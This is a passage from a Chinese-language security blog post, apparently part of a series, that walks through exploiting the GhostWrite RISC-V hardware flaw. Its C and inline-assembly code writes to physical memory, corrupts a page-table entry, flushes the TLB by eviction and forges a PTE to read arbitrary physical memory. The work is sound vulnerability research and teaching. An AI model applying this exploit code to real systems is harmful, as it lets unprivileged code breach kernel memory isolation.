<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">write_8</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">phys_addr</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">val</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">evict</span><span class="p">();</span>
  <span class="kt">int</span> <span class="n">vl</span> <span class="o">=</span> <span class="mi">8</span><span class="p">;</span>
  <span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span>\
    <span class="s">"vsetvli %2, x0, e16, m1</span><span class="se">\n\t</span><span class="s">"</span>
    <span class="s">"vmv.v.x v1, %1</span><span class="se">\n\t</span><span class="s">"</span>
    <span class="s">"mv gp, %0</span><span class="se">\n\t</span><span class="s">"</span>
    <span class="s">".fill 1, 4, 0xf201f0a7</span><span class="se">\n\t</span><span class="s">"</span>
    <span class="o">::</span> <span class="s">"r"</span><span class="p">(</span><span class="n">phys_addr</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">val</span><span class="p">),</span> <span class="s">"r"</span><span class="p">(</span><span class="n">vl</span><span class="p">)</span> <span class="o">:</span> <span class="s">"a5"</span><span class="p">,</span> <span class="s">"gp"</span><span class="p">);</span>
  <span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"fence</span><span class="se">\n\t</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>为了提高命中页表的概率，我们希望知道这些数据更有可能位于物理内存的哪里。GhostWrite 选择的范围是 DRAM 范围的后 $2/3$ 区域，我认为十分合理。计算地址那一行末尾的 <code class="language-plaintext highlighter-rouge">&amp; ~0x1fff</code> 继承自 GhostWrite 作者，一部分原因是为了瞄准页表的第一个页表项来方便后续搜索，但我还没细究前面多出来的那个 <code class="language-plaintext highlighter-rouge">1</code> 是用来干什么的，有想法的读者欢迎在评论区一起讨论。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// (gdb) monitor info mtree</span>
<span class="c1">// 0000000080000000-00000000ffffffff (prio 0, ram): riscv_virt_board.ram</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">start_dram</span>  <span class="o">=</span>  <span class="mh">0x80000000</span><span class="p">;</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">end_dram</span>    <span class="o">=</span> <span class="mh">0x100000000</span><span class="p">;</span>

<span class="kt">uint64_t</span> <span class="n">two_third_start</span> <span class="o">=</span> <span class="n">start_dram</span> <span class="o">+</span> <span class="p">(</span><span class="n">end_dram</span> <span class="o">-</span> <span class="n">start_dram</span><span class="p">)</span> <span class="o">/</span> <span class="mi">3</span><span class="p">;</span>
<span class="o">*</span><span class="n">target</span> <span class="o">=</span> <span class="p">((</span><span class="n">rand</span><span class="p">()</span> <span class="o">%</span> <span class="p">(</span><span class="n">end_dram</span> <span class="o">-</span> <span class="n">two_third_start</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">+</span> <span class="n">two_third_start</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">~</span><span class="mh">0x1fff</span><span class="p">;</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"ghostwrite target: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="n">target</span><span class="p">);</span>
</code></pre></div></div>

<p>我把目标的第二个字节覆写为 0，在页表项中对应两个比特的 RSW 域和六个比特的 PPN 域，大概率可以达到改变映射的效果。（6bits PPN 对应实际地址差距 6+12=18bits）（后注：这里改成第三个 bit 是否会提高成功率？）</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">write_8</span><span class="p">(</span><span class="o">*</span><span class="n">target</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// 2bits RSW 6bits PPN[0]</span>
</code></pre></div></div>

<h3 id="搜索不一致映射">搜索不一致映射</h3>

<p>搜索的过程非常简单粗暴。由于我们刚刚修改的是页表的第一项，而一个最低级页表可以容纳 $0x1000/8=512$ 个页表项，因此我们搜索的跨度是 $0x1000*512$。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="n">vmbase</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">last</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="mh">0x1000</span><span class="o">*</span><span class="mi">512</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span><span class="n">i</span><span class="p">)</span> <span class="o">!=</span> <span class="n">data_page_marker</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"Found: 0x%lx: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="o">*</span><span class="p">((</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span><span class="n">i</span><span class="p">));</span>
	<span class="o">*</span><span class="n">found</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span>
	<span class="k">break</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>在搜索之前需要注意，现代计算机中对于页表项的缓存 TLB 并不会自动刷新，而需要软件手动执行刷新指令，否则我们进行搜索时，MMU 仍然会使用更改前的页表进行地址翻译。不幸的是，刷新 TLB 的指令一般都属于特权指令，只有操作系统内核等高权限代码才可以运行。</p>

<p>好在我们还有暴力的方法：另外创建一片很大的区域，在需要刷新 TLB 的时候遍历访问这片区域，让它的页表项占满 TLB，换出其中原有的页表项。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4096</span><span class="p">)))</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">2</span><span class="o">&lt;&lt;</span><span class="mi">20</span><span class="p">];</span>

<span class="kt">void</span> <span class="nf">evict_init</span><span class="p">()</span> <span class="p">{</span>
  <span class="n">memset</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="mh">0xff</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">));</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">evict</span><span class="p">()</span> <span class="p">{</span>
  <span class="k">for</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span> <span class="n">i</span><span class="o">+=</span><span class="mi">4096</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">maccess</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buffer</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
  <span class="p">}</span>
  <span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"fence</span><span class="se">\n\t</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">evict()</code> 函数最后的 <code class="language-plaintext highlighter-rouge">fence</code> 指令是 RISC-V 中的内存屏障指令，用于确保程序等刷新完毕之后再进行其他访存操作。</p>

<p>将上面两部分代码拼接起来，顺便加上信号量来同步父子线程的搜索。如果最终也没有搜到不一致，就直接结束当前进程。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// child: do the search</span>
<span class="n">sem_wait</span><span class="p">(</span><span class="n">hijack_finish</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="n">found</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// other children have found the target</span>
  <span class="n">sem_post</span><span class="p">(</span><span class="n">search_finish</span><span class="p">);</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">evict</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="n">vmbase</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">last</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="mh">0x1000</span><span class="o">*</span><span class="mi">512</span><span class="p">)</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">((</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span><span class="n">i</span><span class="p">)</span> <span class="o">!=</span> <span class="n">data_page_marker</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"Found: 0x%lx: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="o">*</span><span class="p">((</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span><span class="n">i</span><span class="p">));</span>
	<span class="o">*</span><span class="n">found</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span>
	<span class="k">break</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">}</span>
<span class="n">sem_post</span><span class="p">(</span><span class="n">search_finish</span><span class="p">);</span>
</code></pre></div></div>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// parent</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">child_num</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">sem_post</span><span class="p">(</span><span class="n">hijack_finish</span><span class="p">);</span>
  <span class="n">sem_wait</span><span class="p">(</span><span class="n">search_finish</span><span class="p">);</span>
  <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="n">found</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to find the target</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
  <span class="k">goto</span> <span class="n">main_end</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">main_end</span><span class="o">:</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"done</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
  <span class="n">kill</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">SIGKILL</span><span class="p">);</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>

<h3 id="达成物理地址任意读">达成物理地址任意读</h3>

<p>如果某个子进程找到了不一致，我们就知道了虚拟地址和其 PTE 的物理地址的对应关系了。此时，PTE 物理地址是 <code class="language-plaintext highlighter-rouge">target</code> ，虚拟地址是 <code class="language-plaintext highlighter-rouge">found</code>。假设我们想要攻击的物理地址为 <code class="language-plaintext highlighter-rouge">atk_target</code>，根据 RISC-V 特权手册，我们可以构造一个 PTE，并将其写到 <code class="language-plaintext highlighter-rouge">target</code> 处。在一次 TLB 刷新（<code class="language-plaintext highlighter-rouge">evict()</code>）后，就可以读出目标物理地址的值。</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">uint64_t</span> <span class="n">atk_target</span> <span class="o">=</span> <span class="mh">0x80400000</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">atk_PTE</span> <span class="o">=</span> <span class="p">((</span><span class="n">atk_target</span><span class="o">&gt;&gt;</span><span class="mi">12</span><span class="p">)</span><span class="o">&lt;&lt;</span><span class="mi">10</span><span class="p">)</span> <span class="o">|</span> <span class="mh">0x57</span><span class="p">;</span> <span class="c1">// Flag: A U X W R V</span>

<span class="n">write_64</span><span class="p">(</span><span class="o">*</span><span class="n">target</span><span class="p">,</span> <span class="n">atk_PTE</span><span class="p">);</span>
<span class="n">evict</span><span class="p">();</span>

<span class="n">printf</span><span class="p">(</span><span class="s">"Reading 0x%lx: 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">atk_target</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)(</span><span class="o">*</span><span class="n">found</span><span class="p">));</span>
</code></pre></div></div>

<p>攻击成功率简单试了试还是挺高的，虽然还有很多优化空间。</p>

<p>最后再次放上攻击成功的截图，完结撒花🎉🎉</p>

<p><img src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/202409152153850.png" alt="image.png" /></p>


          </div>
        </div>

        




  

  
    <section class="related-posts">
      <h3 class="related-posts-title">RELATED POSTS</h3>
      <div class="related-posts-list">
        
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2025-10-11 ]</span>
            <a href="/2025/10/11/MidnightSunFinal-2025-Flop.html" class="related-post-link">Midnight Sun CTF 2025 Final - flop</a>
            <span class="common-tags"> #kernel</span>
          </div>
          
          
        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2025-09-28 ]</span>
            <a href="/2025/09/28/Kernel-0.html" class="related-post-link">Kernel: 环境配置</a>
            <span class="common-tags"> #kernel</span>
          </div>
          
          
        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
      
    
      
    
      
        
        
        

        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2024-09-16 ]</span>
            <a href="/2024/09/16/GhostWrite-1.html" class="related-post-link">GhostWrite #1: 漏洞利用思路介绍</a>
            <span class="common-tags"> #riscv #kernel #arch</span>
          </div>
          
          
            
  
      </div>
    </section>
  



        <div id="comments" class="post-comments"></div>
        <script src="https://unpkg.com/valine@1.5.3/dist/Valine.min.js"></script>
<script>
  new Valine({
    el: "#comments",
    app_id: "Ji5y9HTOlb2QGDO0XFlWXNRy-gzGzoHsz",
    app_key: "6VqGye1352LX381YQDTOaiXs",
    placeholder: "El Psy Congroo",
  });
</script>


        <a class="u-url" href="/2025/01/06/GhostWrite-2.html" hidden></a>
</article>

<script src="/assets/js/post.js" defer></script>
<script src="/assets/js/github-repo.js" defer></script>
<script src="/assets/js/link-preview.js" defer></script>

    </div>
  </main><footer class="site-footer h-card">
  <data class="u-url" href="/%20/"></data>
  <div class="wrapper">
    <div class="footer-header">
      <h2 class="footer-heading">[ Y²的博客 ]</h2>
      <p class="footer-status">STATUS: ONLINE / UPTIME: <span id="site-uptime">∞</span></p>
      <script>
        (function () {
          var start = new Date('2022-07-16T00:00:00');
          function update() {
            var now = new Date();
            var diff = now - start;
            if (diff < 0) { return; }
            var years = Math.floor(diff / 31536000000);
            var days = Math.floor((diff % 31536000000) / 86400000);
            var hours = Math.floor((diff % 86400000) / 3600000);
            var mins = Math.floor((diff % 3600000) / 60000);
            var secs = Math.floor((diff % 60000) / 1000);
            document.getElementById('site-uptime').textContent =
              years + 'y ' + days + 'd ' + hours + 'h ' + mins + 'm ' + secs + 's';
          }
          update();
          setInterval(update, 1000);
        })();
      </script>
    </div>

    <div class="footer-layout">
      <!-- Col 1: Contact -->
      <div class="footer-col">
        <div class="footer-title">CONTACT_INFO</div>
        <div class="footer-content">
          <p class="p-name">Y² (aka.cameudis)</p><a class="u-email" href="mailto:cameudis@gmail.com">cameudis@gmail.com</a></div>
      </div>

      <!-- Col 2: Social Links -->
      <div class="footer-col">
        <div class="footer-title">SOCIAL_NETWORKS</div>
        <div class="footer-content"><ul class="social-media-list"><li><a href="https://github.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">cameudis</span></a></li><li><a href="https://twitter.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">cameudis</span></a></li></ul></div>
      </div>

      <!-- Col 3: Visitor Map -->
      <div class="footer-col">
        <div class="footer-title">VISITOR_MAP</div>
        <div class="footer-map-mini">
          <script type="text/javascript" id="mapmyvisitors"
            src="https://mapmyvisitors.com/map.js?d=VEk4VYKnI9sCCEXCgdKor_rhcYKrCEm6C9mIRceo1og&cl=ffffff&w=a"></script>
        </div>
      </div>
    </div>

    <div class="footer-bottom">
      <p class="quiet-humor">/* Free and useless. */</p>
      <div style="margin-bottom: 20px;">
        <img src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/20251230224502598.gif" alt="badge" width="88"
          height="31">
      </div>
      <p>&copy; 2026 Y² (aka.cameudis)</p>
    </div>
  </div>
</footer>
</body>

</html>
